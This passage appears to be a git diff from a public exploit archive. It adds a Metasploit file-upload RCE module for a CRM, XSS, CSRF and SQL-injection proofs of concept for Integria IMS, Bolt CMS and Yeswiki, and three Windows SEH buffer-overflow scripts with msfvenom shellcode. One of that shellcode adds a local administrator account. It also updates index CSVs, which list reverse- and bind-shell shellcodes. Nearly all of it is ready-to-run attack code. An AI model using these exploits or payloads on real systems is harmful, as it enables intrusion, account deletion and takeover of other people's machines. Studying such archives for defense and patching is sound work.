+    data << "\r\n0\r\n-----------------------------{boundary}--\r\n"
+
+    res2 = send_request_cgi({
+      'method' => 'POST',
+      'data'  => data,
+      'headers' =>
+      {
+        'Content-Type'   => 'multipart/form-data;
+boundary=---------------------------{boundary}',
+        'cookie'   => cookie,
+      },
+      'uri' => normalize_uri(target_uri,
+"/index.php?module=configuration/save&redirect_to=configuration/login_page")
+
+    })
+
+
+##
+# Informations
+##
+    print_status("#{peer} - Uploading in progress...")
+    print_good("Upload Successful")
+##
+# Calling Shell File Name
+##
+    shellc = send_request_cgi({
+      'method'   => 'GET',
+      'cookie'   => cookie,
+      'uri'      => normalize_uri(target_uri,
+"/index.php?module=configuration/login_page"),
+    })
+
+        if not (shellc and shellc.body =~ /CFG_APP_LOGIN_PAGE_BACKGROUND\"
+value=\"([^\"]+)\"/)
+            return nil
+        end
+    shelln = $1
+    print_good("#{peer} - Payload uploaded as #{shelln}")
+    register_file_for_cleanup(shelln)
+##
+# Get Session
+##
+    send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri, "/uploads/", shelln),
+    })
+
+  end
+end

exploits/php/webapps/46012.txt

@@ -0,0 +1,27 @@
+# Exploit Title: Integria IMS 5.0.83 - Cross-Site Scripting
+# Exploit Author: Javier Olmedo
+# Website: https://hackpuntes.com
+# Date: 2018-12-18
+# Google Dork: N/A
+# Vendor: Artica ST
+# Software Link: https://github.com/articaST/integriaims
+# Affected Version: 5.0.83 and possibly before
+# Patched Version: 5.0.84
+# Category: Web Application
+# Platform: Windows
+# Tested on: Win10x64 & Kali Linux
+# CVE: 2018-19828
+# References:
+# https://hackpuntes.com/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado/
+# https://github.com/articaST/integriaims/commit/25d810b1c8e138e4b47d5cd14b2cd9b564f19b1e
+
+# 1. Technical Description:
+# search_string parameter is vulnerable to Reflected Cross-Site Scripting (XSS) attacks
+# through a GET request in index.php resource.
+  
+# 2. Proof Of Concept (PoC):
+# On the main page, go to the search form and add the following payload 
+# '><script>alert('PoC CVE-2018-19828')</script>
+
+# 3. Payload
+# http://[PATH]/index.php?search_string=%27%3E%3Cscript%3Ealert(%27PoC%20CVE-2018-19828%27)%3C%2Fscript%3E

exploits/php/webapps/46013.html

@@ -0,0 +1,41 @@
+# Exploit Title: Integria IMS 5.0.83 - Cross-Site Request Forgery
+# Exploit Author: Javier Olmedo
+# Website: https://hackpuntes.com
+# Date: 2018-12-19
+# Google Dork: N/A
+# Vendor: Artica ST
+# Software Link: https://github.com/articaST/integriaims
+# Affected Version: 5.0.83 and possibly before
+# Patched Version: 5.0.84
+# Category: Web Application
+# Platform: Windows & Ubuntu
+# Tested on: Win10x64 & Kali Linux
+# CVE: 2018-19829
+# References:
+# https://hackpuntes.com/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery/
+# https://github.com/articaST/integriaims/commit/a37c0c3d7cad74df64bfd3d98488aee4fa28b839
+
+# 1. Technical Description:
+# Integria IMS version 5.0.83 and possibly before are affected by Cross-Site Request Forgery
+# vulnerability, an attacker could delete users through GET or POST requests.
+ 
+# 2.1 Proof Of Concept (Delete User):
+
+(Method 1 - GET)
+Use Google URL Shortener (or similar) to shorten the next url
+http://[PATH]/ajax.php?page=include/ajax/delete_item_general&delete_item=1&name=delete_user&id=[ID])
+and send it to the victim.
+
+(Method 2 - POST)
+Use next form and send it tho the victim.
+<html>
+  <body>
+    <script>history.pushState('', '', '/')</script>
+    <form action="http://[PATH]/index.php">
+      <input type="hidden" name="sec" value="users" />
+      <input type="hidden" name="sec2" value="godmode&#47;usuarios&#47;lista&#95;usuarios" />
+      <input type="hidden" name="borrar&#95;usuario" value="[ID]" />
+      <input type="submit" value="Delete user" />
+    </form>
+  </body>
+</html>

exploits/php/webapps/46014.txt

@@ -0,0 +1,37 @@
+# Exploit Title: Bolt CMS <3.6.2 - Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2018-12-18
+# Exploit Author: Raif Berkay Dincel [ author=9567 ]
+# Contact: www.raifberkaydincel.com
+# Vendor Homepage: bolt.cm 
+# Vulnerable Software --> [ https://github.com/rdincel1/Bolt-CMS-3.6.2---Cross-Site-Scripting/raw/master/bolt-v3.6.2.zip ]
+# Affected Version: [ < 3.6.2 ]
+# CVE-ID: CVE-2018-19933
+# Tested on: Parrot Security OS / Linux Mint / Windows 10
+
+# Vulnerable Parameter Type: POST 
+# Vulnerable Parameter: http://127.0.0.1:8000/preview/page
+# Attack Pattern: <script>alert("Raif")</script> 
+
+# Description
+
+Bolt CMS <3.6.2 allows XSS via text input click preview button as demonstrated by the Title field of a Configured and New Entry.
+
+# PoC [Video]: https://youtu.be/3eTPyIpjCJg
+ 
+# Proof of Concepts:
+ 
+POST /preview/page HTTP/1.1
+Host: 127.0.0.1:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1:8000/bolt/editcontent/pages
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 396
+Connection: close
+Cookie: bolt_session_cf7976ea5999f8e272ce7cd50c84d240=14b61865131cf9422af970ae28a097b7; bolt_authtoken_cf7976ea5999f8e272ce7cd50c84d240=0b69633d5a549f19bf3faa88462b7b8e17ba57ba9dff6d25a708efe6dd6a9a04
+Upgrade-Insecure-Requests: 1
+
+content_edit%5B_token%5D=jMmm41dJQXpXx3gwE_VQkA60fdsNo6DERJClPVkYh7U&editreferrer=&contenttype=pages&title=%3Cscript%3Ealert%28%22Raif%22%29%3C%2Fscript%3E&slug=script-alert-raif-script&image%5Bfile%5D=&files%5B%5D=&teaser=&body=&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2018-12-07+00%3A12%3A05&datedepublish=&ownerid=1&_live-editor-preview=

exploits/php/webapps/46015.txt

@@ -0,0 +1,19 @@
+# Exploit Title: SQL Injection in Yeswiki (Cercopitheque)
+# Date: 02/07/2018
+# Exploit Author: Mickael BROUTY (@ark1nar) - FIDENS 
+# Vendor Homepage: https://yeswiki.net
+# Software Link: https://repository.yeswiki.net/cercopitheque/yeswiki-cercopitheque-2018-12-07-1.zip
+# Version: Yeswiki Cercopitheque 2018-06-19-1
+# Tested on: Kali linux
+# CVE : CVE-2018-13045
+
+
+# POC:
+# 1)
+# http://localhost/[PATH]/?BaZar&vue=exporter&id=[SQL]
+#
+
+
+Exploitation example:
+
+http://localhost/[PATH]/?BaZar&vue=exporter&id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15#

exploits/windows/local/46008.py

@@ -0,0 +1,59 @@
+# Exploit Title: PassFab RAR Password Recovery SEH Local Exploit
+# Date: 16-12-2018
+# Vendor Homepage:https://www.passfab.com/products/rar-password-recovery.html
+# Software Link:  https://www.passfab.com/downloads/passfab-rar-password-recovery.exe
+# Exploit Author: Achilles
+# Tested Version: 9.3.2
+# Tested on: Windows XP SP3
+
+
+# 1.- Run python code : PassFab_RAR
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open PassFab RAR Password Recovery
+# 4.- In the new Window click on the key in the upper right corner
+# 5.- Paste the content of EVIL.txt into the Field: 'Licensed E-mail and Registration Code'
+# 6.- Click 'Register'and the calculator will open
+# 7.- Greetings go:XiDreamzzXi,Metatron
+
+#!/usr/bin/python
+
+#!/usr/bin/env python
+buffer = "\x41" * 260
+NSEH = "\xeb\x06\x90\x90" #jmp short 6
+SEH =  "\xdd\x74\x06\x10" #pop pop ret SoftwareLog.dll
+nops = "\x90" * 20
+
+#badchar \x00\
+#msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python
+buf =  ""
+buf += "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\x5d"
+buf += "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\xc5"
+buf += "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\xde"
+buf += "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\xeb"
+buf += "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\x32"
+buf += "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\x84"
+buf += "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\x27"
+buf += "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\xe3"
+buf += "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\xb5"
+buf += "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\xc8"
+buf += "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\xb3"
+buf += "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\x78"
+buf += "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\x15"
+buf += "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\x3a"
+buf += "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\x05"
+buf += "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\x0b"
+buf += "\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\x26"
+buf += "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\x82"
+buf += "\x8e\x2a\x79\xdb"
+
+payload = buffer + NSEH + SEH + nops + buf
+
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(payload)
+	f.write(payload)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"

exploits/windows/local/46009.py

@@ -0,0 +1,108 @@
+#!/usr/bin/python
+
+#------------------------------------------------------------------------------------------------------------------------------------#
+# Exploit: LanSpy 2.0.1.159 - Local Buffer Overflow RCE(PoC)                                                                         #
+# Date: 2018-12-16                                                                                                                   #
+# Author: Juan Prescotto                                                                                                             #
+# Tested Against: Win7 Pro SP1 64 bit                                                                                                #
+# Software Download #1: https://www.exploit-db.com/apps/70a780b78ee7dbbbbc99852259f75d53-lanspy_setup_2.0.1.159.exe                  #
+# Software Download #2: https://lizardsystems.com/download/lanspy_setup.exe                                                          # 
+# Version: 2.0.1.159                                                                                                                 #
+# Special Thanks to my wife for allowing me spend countless hours on this passion of mine                                            #
+# Credit: Thanks to Gionathan "John" Reale (https://www.exploit-db.com/exploits/45968) for his work on the Denial of Service exploit #
+# Steps : Open the APP > click on the scan field > paste in contents from the .txt file that was generated by this script            #
+#------------------------------------------------------------------------------------------------------------------------------------#
+# Bad Characers: \x00 thru \x20 and \x2c\x2d                                                                                         #
+# EIP Offset: 680                                                                                                                    #
+# Non-Participating Modules: lanspy.exe                                                                                              #
+#------------------------------------------------------------------------------------------------------------------------------------#
+# Run LanSpy with Administrative Rights, when exploit.txt contents are pasted into scan field and run a Local User will be created:  #
+# User: Metasploit    Password: MyPassword12                                                                                         #
+#------------------------------------------------------------------------------------------------------------------------------------#
+# EIP overwrite --> JMP ECX --> Short Relative Reverse JMP --> Long Relative Reverse JMP --> NoPs --> Stack Adjustment --> Shellcode #
+#------------------------------------------------------------------------------------------------------------------------------------#
+
+#msfvenom -p windows/adduser USER=metasploit PASS=MyPassword12 --bad-chars \x00\x01\x02\x03\x04\x05\x06\x07\x09\x0a\x0b\x0c\x0d\x0f\x10\x11\x12\x13\x14\x1a\x1b\x1c\x1d\x1e\x1f\x2c --format python -v shellcode
+#Payload size: 626 bytes
+
+shellcode =  ""
+shellcode += "\x89\xe5\xda\xd1\xd9\x75\xf4\x5b\x53\x59\x49\x49"
+shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
+shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
+shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
+shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+shellcode += "\x39\x6c\x39\x78\x6b\x32\x65\x50\x45\x50\x73\x30"
+shellcode += "\x31\x70\x6d\x59\x58\x65\x36\x51\x4f\x30\x43\x54"
+shellcode += "\x6c\x4b\x56\x30\x70\x30\x6e\x6b\x63\x62\x54\x4c"
+shellcode += "\x4e\x6b\x66\x32\x65\x44\x6c\x4b\x54\x32\x47\x58"
+shellcode += "\x76\x6f\x68\x37\x30\x4a\x31\x36\x75\x61\x69\x6f"
+shellcode += "\x6e\x4c\x75\x6c\x35\x31\x43\x4c\x55\x52\x36\x4c"
+shellcode += "\x45\x70\x4b\x71\x78\x4f\x76\x6d\x65\x51\x69\x57"
+shellcode += "\x6d\x32\x4c\x32\x33\x62\x53\x67\x4c\x4b\x61\x42"
+shellcode += "\x42\x30\x6c\x4b\x31\x5a\x47\x4c\x6e\x6b\x50\x4c"
+shellcode += "\x52\x31\x54\x38\x6a\x43\x47\x38\x75\x51\x7a\x71"
+shellcode += "\x46\x31\x4c\x4b\x36\x39\x35\x70\x47\x71\x38\x53"
+shellcode += "\x4e\x6b\x43\x79\x67\x68\x39\x73\x35\x6a\x73\x79"
+shellcode += "\x4e\x6b\x34\x74\x6c\x4b\x75\x51\x6a\x76\x35\x61"
+shellcode += "\x4b\x4f\x4c\x6c\x7a\x61\x48\x4f\x64\x4d\x67\x71"
+shellcode += "\x68\x47\x37\x48\x6b\x50\x32\x55\x39\x66\x33\x33"
+shellcode += "\x53\x4d\x4a\x58\x37\x4b\x43\x4d\x65\x74\x52\x55"
+shellcode += "\x38\x64\x73\x68\x6e\x6b\x46\x38\x75\x74\x73\x31"
+shellcode += "\x78\x53\x72\x46\x6e\x6b\x54\x4c\x30\x4b\x6e\x6b"
+shellcode += "\x63\x68\x75\x4c\x36\x61\x58\x53\x6e\x6b\x47\x74"
+shellcode += "\x6c\x4b\x35\x51\x68\x50\x4b\x39\x50\x44\x46\x44"
+shellcode += "\x54\x64\x61\x4b\x73\x6b\x53\x51\x56\x39\x43\x6a"
+shellcode += "\x53\x61\x6b\x4f\x79\x70\x63\x6f\x53\x6f\x62\x7a"
+shellcode += "\x4e\x6b\x54\x52\x5a\x4b\x4e\x6d\x61\x4d\x72\x4a"
+shellcode += "\x46\x61\x6c\x4d\x4d\x55\x78\x32\x57\x70\x55\x50"
+shellcode += "\x63\x30\x52\x70\x62\x48\x34\x71\x6c\x4b\x32\x4f"
+shellcode += "\x4b\x37\x59\x6f\x4e\x35\x6d\x6b\x6c\x30\x78\x35"
+shellcode += "\x6e\x42\x71\x46\x61\x78\x59\x36\x6d\x45\x4f\x4d"
+shellcode += "\x6f\x6d\x79\x6f\x4e\x35\x57\x4c\x57\x76\x43\x4c"
+shellcode += "\x57\x7a\x4d\x50\x4b\x4b\x4d\x30\x61\x65\x43\x35"
+shellcode += "\x4d\x6b\x31\x57\x54\x53\x44\x32\x52\x4f\x33\x5a"
+shellcode += "\x75\x50\x72\x73\x4b\x4f\x69\x45\x73\x53\x50\x6d"
+shellcode += "\x62\x44\x54\x6e\x51\x75\x44\x38\x65\x35\x31\x30"
+shellcode += "\x66\x4f\x35\x33\x31\x30\x42\x4e\x33\x55\x61\x64"
+shellcode += "\x77\x50\x52\x55\x63\x43\x50\x65\x61\x62\x67\x50"
+shellcode += "\x52\x4d\x51\x75\x54\x34\x73\x51\x61\x63\x70\x70"
+shellcode += "\x50\x6c\x70\x6f\x63\x59\x64\x34\x55\x70\x50\x4d"
+shellcode += "\x31\x69\x50\x50\x70\x61\x74\x33\x44\x33\x54\x37"
+shellcode += "\x42\x4f\x34\x32\x73\x54\x34\x71\x54\x72\x67\x50"
+shellcode += "\x54\x6f\x32\x61\x51\x54\x77\x34\x71\x30\x76\x46"
+shellcode += "\x36\x46\x31\x30\x30\x6e\x51\x75\x31\x64\x55\x70"
+shellcode += "\x70\x6c\x42\x4f\x70\x63\x70\x61\x70\x6c\x70\x67"
+shellcode += "\x72\x52\x30\x6f\x72\x55\x44\x30\x35\x70\x51\x51"
+shellcode += "\x73\x54\x42\x4d\x55\x39\x72\x4e\x50\x69\x71\x63"
+shellcode += "\x32\x54\x34\x32\x31\x71\x70\x74\x50\x6f\x54\x32"
+shellcode += "\x64\x33\x51\x30\x30\x6d\x35\x35\x64\x34\x70\x61"
+shellcode += "\x70\x73\x32\x50\x32\x4c\x70\x6f\x45\x39\x71\x64"
+shellcode += "\x77\x50\x56\x4f\x72\x61\x43\x74\x63\x74\x63\x30"
+shellcode += "\x41\x41"
+
+if len(shellcode) > 633:
+	exit("[+] Shellcode is too big! Shellcode must be smaller than 633 bytes")
+
+sled = "\x90" * 8
+
+#Necessary to allow shellcode room to operate
+stack_adjust = "\x83\xec\x78" * 10
+
+reverse_jmp_long = "\xe9\x5c\xfd\xff\xff"
+
+reverse_jmp_short = "\x41\xeb\xf6\x41"
+
+junk = "\x41" * (680 - len(sled) - len(stack_adjust) - len(shellcode) - len(reverse_jmp_long) - len(reverse_jmp_short))
+
+#004040AD JMP ECX (lanspy.exe)
+eip = "\xad\x40\x40"
+
+payload = sled + stack_adjust + shellcode + junk + reverse_jmp_long + reverse_jmp_short + eip
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows/local/46016.py

@@ -0,0 +1,57 @@
+# Exploit Title: PDF Explorer SEH Local Exploit
+# Original Discovery:Gionathan "John" Reale (DoS exploit)
+# Exploit Author: Achilles
+# Date: 18-12-2018
+# Vendor Homepage: http://www.rttsoftware.com/
+# Software Link:   https://www.rttsoftware.com/files/PDFExplorerTrialSetup.zip
+# Tested Version: 1.5.66.2
+# Tested on: Windows XP SP3
+
+
+# 1.- Run python code : PDF_Explorer.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open PDF Explorer
+# 4.- When inside the program click "Database" > "Custom fields settings...
+"
+# 5.- Paste the content of EVIL.txt into the Field:'Label'and the calculator will Open
+# 7.- Greetings go:XiDreamzzXi,Metatron
+
+
+#!/usr/bin/python
+#!/usr/bin/env python
+buffer =3D "\x41" * 292
+NSEH =3D "\xeb\x06\x90\x90"       #jmp short 6
+SEH  =3D "\x3f\x28\xd1\x72"       #0x72d1283f pop eax # pop esi # ret 0x04 [msacm32.drv]
+nops =3D "\x90" * 20
+
+#msfvenom -p windows/exec CMD=3Dcalc.exe -b "\x00\x0a\x0d\x23\x80" -f pytho=
+n
+schellcode =3D ("\xda\xcb\xbf\xbd\x81\x73\x52\xd9\x74\x24\xf4\x5e\x29"=20
+"\xc9\xb1\x31\x31\x7e\x18\x03\x7e\x18\x83\xc6\xb9\x63"
+"\x86\xae\x29\xe1\x69\x4f\xa9\x86\xe0\xaa\x98\x86\x97"
+"\xbf\x8a\x36\xd3\x92\x26\xbc\xb1\x06\xbd\xb0\x1d\x28"
+"\x76\x7e\x78\x07\x87\xd3\xb8\x06\x0b\x2e\xed\xe8\x32"
+"\xe1\xe0\xe9\x73\x1c\x08\xbb\x2c\x6a\xbf\x2c\x59\x26"
+"\x7c\xc6\x11\xa6\x04\x3b\xe1\xc9\x25\xea\x7a\x90\xe5"
+"\x0c\xaf\xa8\xaf\x16\xac\x95\x66\xac\x06\x61\x79\x64"
+"\x57\x8a\xd6\x49\x58\x79\x26\x8d\x5e\x62\x5d\xe7\x9d"
+"\x1f\x66\x3c\xdc\xfb\xe3\xa7\x46\x8f\x54\x0c\x77\x5c"
+"\x02\xc7\x7b\x29\x40\x8f\x9f\xac\x85\xbb\x9b\x25\x28"
+"\x6c\x2a\x7d\x0f\xa8\x77\x25\x2e\xe9\xdd\x88\x4f\xe9"
+"\xbe\x75\xea\x61\x52\x61\x87\x2b\x38\x74\x15\x56\x0e"
+"\x76\x25\x59\x3e\x1f\x14\xd2\xd1\x58\xa9\x31\x96\x97"
+"\xe3\x18\xbe\x3f\xaa\xc8\x83\x5d\x4d\x27\xc7\x5b\xce"
+"\xc2\xb7\x9f\xce\xa6\xb2\xe4\x48\x5a\xce\x75\x3d\x5c"
+"\x7d\x75\x14\x3f\xe0\xe5\xf4\xee\x87\x8d\x9f\xee")
+
+payload =3D buffer + NSEH + SEH + nops + schellcode
+
+
+try:
+f=open("Evil.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(payload)
+f.write(payload)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"

files_exploits.csv

@@ -3177,7 +3177,7 @@ id,file,description,date,author,type,platform,port
 24135,exploits/windows/dos/24135.html,"Microsoft Internet Explorer 5.0.1 - CSS Style Sheet Memory Corruption",2004-05-18,henkie_is_leet,dos,windows,
 24142,exploits/windows/dos/24142.pl,"Mollensoft Lightweight FTP Server 3.6 - Remote Denial of Service",2004-05-24,storm,dos,windows,
 24143,exploits/hardware/dos/24143.c,"VocalTec VGW120/VGW480 Telephony Gateway Remote H.225 - Denial of Service",2004-05-24,Alexander,dos,hardware,
-24144,exploits/windows/dos/24144.txt,"MiniShare Server 1.3.2 - Remote Denial of Service",2004-05-26,"Donato Ferrante",dos,windows,
+24144,exploits/windows/dos/24144.txt,"MiniShare 1.3.2 - Remote Denial of Service",2004-05-26,"Donato Ferrante",dos,windows,
 24145,exploits/windows/dos/24145.c,"Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (1)",2004-05-25,badpack3t,dos,windows,
 24146,exploits/windows/dos/24146.bat,"Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (2)",2004-06-02,CoolICE,dos,windows,
 24147,exploits/windows/dos/24147.bat,"Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (3)",2004-06-02,CoolICE,dos,windows,
@@ -7486,7 +7486,7 @@ id,file,description,date,author,type,platform,port
 15344,exploits/linux/local/15344.c,"Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite",2010-10-28,"Kees Cook",local,linux,
 15376,exploits/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 - Local Kernel",2010-11-01,"Nikita Tarakanov",local,windows,
 15403,exploits/windows/local/15403.py,"MiniShare 1.4.0 < 1.5.5 - 'users.txt' Local Buffer Overflow",2010-11-02,"Chris Gabriel",local,windows,
-15406,exploits/windows/local/15406.rb,"MiniShare 1.5.5 - Local Buffer Overflow (SEH)",2010-11-03,"Muhamad Fadzil Ramli",local,windows,
+15406,exploits/windows/local/15406.rb,"MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (SEH)",2010-11-03,"Muhamad Fadzil Ramli",local,windows,
 15417,exploits/windows/local/15417.pl,"GSPlayer 1.83a Win32 Release - Local Buffer Overflow",2010-11-04,moigai,local,windows,
 15461,exploits/windows/local/15461.c,"G Data TotalCare 2011 - Local Kernel",2010-11-08,"Nikita Tarakanov",local,windows,
 15475,exploits/multiple/local/15475.txt,"IBM OmniFind - Local Privilege Escalation",2010-11-09,"Fatih Kilic",local,multiple,
@@ -10154,6 +10154,10 @@ id,file,description,date,author,type,platform,port
 45985,exploits/windows/local/45985.rb,"CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)",2018-12-13,Metasploit,local,windows,
 45988,exploits/windows/local/45988.py,"Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH)",2018-12-14,"Manpreet Singh Kheberi",local,windows,
 46005,exploits/windows/local/46005.py,"Nsauditor 3.0.28.0 - Local SEH Buffer Overflow",2018-12-18,Achilles,local,windows,
+46006,exploits/linux/local/46006.c,"Linux Kernel 4.4 - 'rtnetlink' Stack Memory Disclosure",2018-12-19,"Jinbum Park",local,linux,
+46008,exploits/windows/local/46008.py,"PassFab RAR 9.3.2 - Buffer Overflow (SEH)",2018-12-19,Achilles,local,windows,
+46009,exploits/windows/local/46009.py,"LanSpy 2.0.1.159 - Local Buffer Overflow",2018-12-19,"Juan Prescotto",local,windows,
+46016,exploits/windows/local/46016.py,"PDF Explorer 1.5.66.2 - Buffer Overflow (SEH)",2018-12-19,Achilles,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -11456,7 +11460,7 @@ id,file,description,date,author,type,platform,port
 9862,exploits/hardware/remote/9862.txt,"3Com OfficeConnect - Code Execution",2009-10-19,"Andrea Fabizi",remote,hardware,
 9886,exploits/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit)",2009-10-16,"Pankaj Kohli_ Trancer",remote,windows,
 9893,exploits/windows/remote/9893.txt,"Microsoft Internet Explorer 5/6/7 - Memory Corruption (MS09-054)",2009-10-15,Skylined,remote,windows,80
-9896,exploits/windows/remote/9896.txt,"MiniShare HTTP 1.5.5 - Remote Buffer Overflow",2009-10-19,iM4n,remote,windows,80
+9896,exploits/windows/remote/9896.txt,"MiniShare 1.5.5 - Remote Buffer Overflow",2009-10-19,iM4n,remote,windows,80
 9900,exploits/windows/remote/9900.txt,"NaviCOPA 3.0.1.2 - Source Disclosure",2009-10-14,Dr_IDE,remote,windows,
 9902,exploits/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 - Remote Buffer Overflow",2009-10-26,"karak0rsan_ murderkey",remote,windows,80
 9905,exploits/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 < 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",remote,windows,1521
@@ -17013,7 +17017,7 @@ id,file,description,date,author,type,platform,port
 45952,exploits/windows/remote/45952.rb,"HP Intelligent Management - Java Deserialization RCE (Metasploit)",2018-12-04,Metasploit,remote,windows,8080
 45986,exploits/hardware/remote/45986.py,"Cisco RV110W - Password Disclosure / Command Execution",2018-12-14,RySh,remote,hardware,443
 45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos,
-45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method",2018-12-18,"Rafael Pedrero",remote,windows,80
+45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow",2018-12-18,"Rafael Pedrero",remote,windows,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40501,3 +40505,10 @@ id,file,description,date,author,type,platform,port
 45995,exploits/php/webapps/45995.txt,"Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution",2018-12-14,"Ihsan Sencan",webapps,php,
 45997,exploits/php/webapps/45997.txt,"Double Your Bitcoin Script Automatic - Authentication Bypass",2018-12-14,Veyselxan,webapps,php,
 46000,exploits/xml/webapps/46000.txt,"SDL Web Content Manager 8.5.0 - XML External Entity Injection",2018-12-18,"Ahmed Elhady Mohamed",webapps,xml,
+46010,exploits/php/webapps/46010.html,"Hotel Booking Script 3.4 - Cross-Site Request Forgery (Change Admin Password)",2018-12-19,"Sainadh Jamalpur",webapps,php,80
+46011,exploits/php/webapps/46011.rb,"Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)",2018-12-19,AkkuS,webapps,php,
+46012,exploits/php/webapps/46012.txt,"Integria IMS 5.0.83 - 'search_string' Cross-Site Scripting",2018-12-19,"Javier Olmedo",webapps,php,80
+46013,exploits/php/webapps/46013.html,"Integria IMS 5.0.83 - Cross-Site Request Forgery",2018-12-19,"Javier Olmedo",webapps,php,80
+46014,exploits/php/webapps/46014.txt,"Bolt CMS < 3.6.2 - Cross-Site Scripting",2018-12-19,"Raif Berkay Dincel",webapps,php,80
+46015,exploits/php/webapps/46015.txt,"Yeswiki Cercopitheque - 'id' SQL Injection",2018-12-19,"Mickael BROUTY",webapps,php,80
+46017,exploits/multiple/webapps/46017.txt,"IBM Operational Decision Manager 8.x - XML External Entity Injection",2018-12-19,"Mohamed M.Fouad",webapps,multiple,9443

files_shellcodes.csv

@@ -926,3 +926,4 @@ id,file,description,date,author,type,platform
 45940,shellcodes/linux/45940.nasm,"Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux
 45943,shellcodes/linux_x86-64/45943.c,"Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)",2018-12-04,"Kağan Çapar",shellcode,linux_x86-64
 45980,shellcodes/linux_x86/45980.c,"Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86
+46007,shellcodes/linux_x86-64/46007.c,"Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)",2018-12-19,"Kağan Çapar",shellcode,linux_x86-64

shellcodes/linux_x86-64/46007.c

@@ -0,0 +1,85 @@
+/* 
